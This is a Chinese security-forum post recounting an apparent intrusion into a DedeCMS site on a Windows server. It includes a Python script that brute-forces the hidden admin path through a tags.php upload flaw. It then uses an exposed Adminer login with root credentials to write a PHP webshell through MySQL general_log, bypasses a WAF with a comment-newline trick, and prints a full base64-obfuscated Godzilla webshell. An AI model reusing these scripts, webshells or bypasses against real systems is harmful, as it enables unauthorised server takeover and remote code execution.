安全矩阵

 找回密码
 立即注册
搜索
查看: 4083|回复: 0

记一次偶遇Adminer

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-9-29 15:40:00 | 显示全部楼层 |阅读模式
原文链接:记一次偶遇Adminer

又是无聊的一天打开高危扫描器开扫,结果啥也没扫出来,然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms,服务器windows


各种历史洞打了一遍都没用,因为是windows可以用这个跑下后台
  1. import requests
  2. import itertools
  3. characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
  4. back_dir = ""
  5. flag = 0
  6. url = "http://www.test.com/tags.php"
  7. data = {
  8.     "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
  9.     "_FILES[mochazz][name]" : 0,
  10.     "_FILES[mochazz][size]" : 0,
  11.     "_FILES[mochazz][type]" : "image/gif"
  12. }

  13. for num in range(1,7):
  14.     if flag:
  15.         break
  16.     for pre in itertools.permutations(characters,num):
  17.         pre = ''.join(list(pre))
  18.         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
  19.         print("testing",pre)
  20.         r = requests.post(url,data=data)
  21.         if "Upload filetype not allow !" not in r.text and r.status_code == 200:
  22.             flag = 1
  23.             back_dir = pre
  24.             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
  25.             break
  26.         else:
  27.             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
  28. print("[+] 前缀为:",back_dir)
  29. flag = 0
  30. for i in range(30):
  31.     if flag:
  32.         break
  33.     for ch in characters:
  34.         if ch == characters[-1]:
  35.             flag = 1
  36.             break
  37.         data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
  38.         r = requests.post(url, data=data)
  39.         if "Upload filetype not allow !" not in r.text and r.status_code == 200:
  40.             back_dir += ch
  41.             print("[+] ",back_dir)
  42.             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
  43.             break
  44.         else:
  45.             data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

  46. print("后台地址为:",back_dir)
复制代码

结果跑完居然是dede,这就扯了我访问dede是404.


如果找到后台的话还可以用这个洞猜一下管理员账号:
  1. http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
复制代码

山穷水尽了随手试了一下adminer.php居然存在(扫描器里有adminer.php的估计扫的目录太多了被封ip了所以不要相信扫描器)


然后就是又开始读文件了,先随意读一下,让它报出web路径来


因为是dedecms所以直接读 data\common.inc.php

文件不存在?直接放F盘下读一下

发现账号为root,直接登录adminer.php通过日志getshell

set global general_log=on 开启general log模式set global general_log_file='F:\\*****\\shell.php';设置日志路径select '<?php eval($_POST['pwd']);?>'; 写shell毫无疑问最后这里被拦了,抓个包来测吧,select '<?php '不拦

select+'<?php+phpinfo();+?>'拦掉

使用注释换行绕过select+'<?php+//%0Aphpinfo();+?>'

写个哥斯拉的马
  1. select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>'
复制代码



成功连上,system




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 07:38 , Processed in 0.012212 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表